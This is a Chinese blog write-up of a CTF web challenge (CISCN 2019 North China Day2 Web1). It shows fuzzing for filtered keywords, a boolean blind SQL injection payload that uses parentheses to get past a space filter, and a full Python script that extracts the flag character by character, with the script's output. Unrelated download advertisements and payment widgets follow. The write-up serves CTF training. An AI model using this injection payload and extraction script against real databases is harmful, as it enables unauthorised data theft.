[CISCN 2019华北Day2]Web1

[CISCN 2019华北Day2]Web1

1.题目给了输入框,很明显是要注入

传入:1

​​请添加图片描述
传入:1’
请添加图片描述
传入:1"
请添加图片描述


可以看到判断注入点的时候被检测到了,可能是过滤了某些字符,有bool(false),显然这题布尔盲注

2.下面我们进行fuzz测试,看看过滤了哪些字符

485的都是被过滤了,selec,from,括号没有过滤,我们用括号绕过空格

请添加图片描述

3.这里我们构造payload测试

payload:id=(select(ascii(substr(flag,1,1))=78)from(flag))

因为题目给了flag位置,我们截取flag列第一个字段,将其ascii码值与78比较(78是’N’),如果值为1则页面返回正常

请添加图片描述

4.接下来我们写猜解脚本

import requests

# 网站路径
url = "http://node4.anna.nssctf.cn:28751/"

# 枚举字符的payload
payload_str = "(select(ascii(substr(flag,{l},1))={n})from(flag))"

# post请求参数
data= {"id":payload_str}

# 枚举字符
def getFlag():
    flag = ''
    # 从第一个字符开始截取
    for i in range(1,100):
        # 枚举字符的每一种可能性
        for n in range(32, 126):
            data["id"] = payload_str.format(l=i, n=n)
            response = requests.post(url=url, data=data)
            if 'Hello' in response.text:
                flag += chr(n)
                print(flag)
                break
        if flag[-1] == '}':
            break

if __name__ == '__main__':
    getFlag()
# 输出
N
NS
NSS
NSSC
NSSCT
NSSCTF
NSSCTF{
NSSCTF{a
NSSCTF{a2
NSSCTF{a2d
NSSCTF{a2da
NSSCTF{a2daf
NSSCTF{a2dafa
NSSCTF{a2dafa8
NSSCTF{a2dafa89
NSSCTF{a2dafa89-
NSSCTF{a2dafa89-b
NSSCTF{a2dafa89-b6
NSSCTF{a2dafa89-b6e
NSSCTF{a2dafa89-b6e8
NSSCTF{a2dafa89-b6e8-
NSSCTF{a2dafa89-b6e8-4
NSSCTF{a2dafa89-b6e8-4f
NSSCTF{a2dafa89-b6e8-4f9
NSSCTF{a2dafa89-b6e8-4f9d
NSSCTF{a2dafa89-b6e8-4f9d-
NSSCTF{a2dafa89-b6e8-4f9d-8
NSSCTF{a2dafa89-b6e8-4f9d-8d
NSSCTF{a2dafa89-b6e8-4f9d-8d1
NSSCTF{a2dafa89-b6e8-4f9d-8d18
NSSCTF{a2dafa89-b6e8-4f9d-8d18-
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1e
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f7
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f73
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f73e
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f73e4
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f73e47
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f73e47c
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f73e47c8
NSSCTF{a2dafa89-b6e8-4f9d-8d18-1ef4f73e47c8}

  • 17
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【优质项目推荐】 1、项目代码均经过严格本地测试,运行OK,确保功能稳定后才上传平台。可放心下载并立即投入使用,若遇到任何使用问题,随时欢迎私信反馈与沟通,博主会第一时间回复。 2、项目适用于计算机相关专业(如计科、信息安全、数据科学、人工智能、通信、物联网、自动化、电子信息等)的在校学生、专业教师,或企业员工,小白入门等都适用。 3、该项目不仅具有很高的学习借鉴价值,对于初学者来说,也是入门进阶的绝佳选择;当然也可以直接用于 毕设、课设、期末大作业或项目初期立项演示等。 3、开放创新:如果您有一定基础,且热爱探索钻研,可以在此代码基础上二次开发,进行修改、扩展,创造出属于自己的独特应用。 欢迎下载使用优质资源!欢迎借鉴使用,并欢迎学习交流,共同探索编程的无穷魅力! 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip 基于业务逻辑生成特征变量python实现源码+数据集+超详细注释.zip
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值